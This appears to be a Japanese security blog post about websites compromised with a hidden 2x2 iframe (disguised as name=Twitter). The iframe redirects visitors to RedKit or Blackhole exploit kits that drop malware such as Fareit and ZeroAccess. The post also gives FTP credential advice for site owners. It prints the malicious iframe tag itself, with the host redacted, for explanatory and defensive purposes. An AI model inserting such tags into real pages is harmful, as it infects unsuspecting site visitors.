サイト改ざんiframe name Twitter scrolling auto frameborder no align center height

これは普通の一般サイトに悪意のある第三者が挿入した不正な<IFRAME>タグになります。 <挿入位置はHTMLタグの最後尾付近

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http //(乗っ取られてる正規サイト)/***.html?i=(数字)></iframe>
『name=Twitter』なんてな文字列が見えるけど、つぶやきサービス Twitter に関連するコードではいっさいありませんよぅ!
 
この不正なタグが仕掛れられてる一般サイトを閲覧した瞬間に、強制的なウイルス感染となるドライブバイ・ダウンロードという攻撃が発動します。

サイトがハッキングされるきっかけは?

サイト管理者が使用するWindowsパソコンが何かしらウイルスに感染して、インストールされてるFTPソフトからアカウント情報が抜き取られた可能性があります。
  • Win32/Fareit ← 大部分がこっち
  • Win32/Kelihos
というのも、CGIやPHPが利用できない無料ホームページサービスのサイトがだいぶ殺られてるためです。
 
★ FTPソフトのウイルス対策 (サイト管理者向け)
 
【1】 FTPソフトがサポートしてるマスターパスワード機能を活用して、設定データからアカウント情報を引っこ抜かれないようにしましょう。 (FFFTPの解説)
 
【2】 マスターパスワード機能をサポートしておらず、パスワード文字列を生身の状態で出力する無料FTPソフト FileZilla は、ぜっっっったいにパスワードを保存してはいけません。危険!
 

ブラウザ内部で読み込まされるエクスプロイトキット

「RedKit Exploit Kit」と呼ばれるWebアプリケーションが仕込まれたページヘ転送されます。
  1. Java ← 記事投稿時点で攻撃処理あり
  2. Adobe Reader ← 記事投稿時点で攻撃処理あり
  3. Adobe Flash Player
  4. Windows Update
また、「Blackhole Exploit Kit」と呼ばれるWebアプリケーションが仕込まれたページヘ転送されるパターンも確認してます。
  1. Java
  2. Adobe Reader
  3. Adobe Flash Player
  4. Windows Update
4系統の旧バージョンに存在する危険な脆弱性(ぜいじゃくせい)を悪用したウイルス感染攻撃処理がブラウザ内部で行われます。
 
きっちり無料ウイルス対策ができてないと、とても人気なセキュリティソフトを導入してるのにウイルス感染する悲劇がっ!
 

対策をしてないユーザーに配信されるマルウェアたち

下のようなマルウェアが単品で送り込まれる、あるいは複数一挙に送り込まれるでしょう。
 
- TrojanDownloader:Win32/Karagany ... 別のマルウェアをダウンロードし起動する 
- PWS:Win32/Fareit ... FTPソフトやブラウザの設定データなど機密情報を引っこ抜く
- Trojan:Win32/Sirefef ... ZeroAccessルートキット
- Rouge:Win32/Winwebsec ... 偽セキュリティソフト
- Rouge:Win32/FakeDef ... 偽セキュリティソフト
- Worm:Win32/Cridex ... バックドア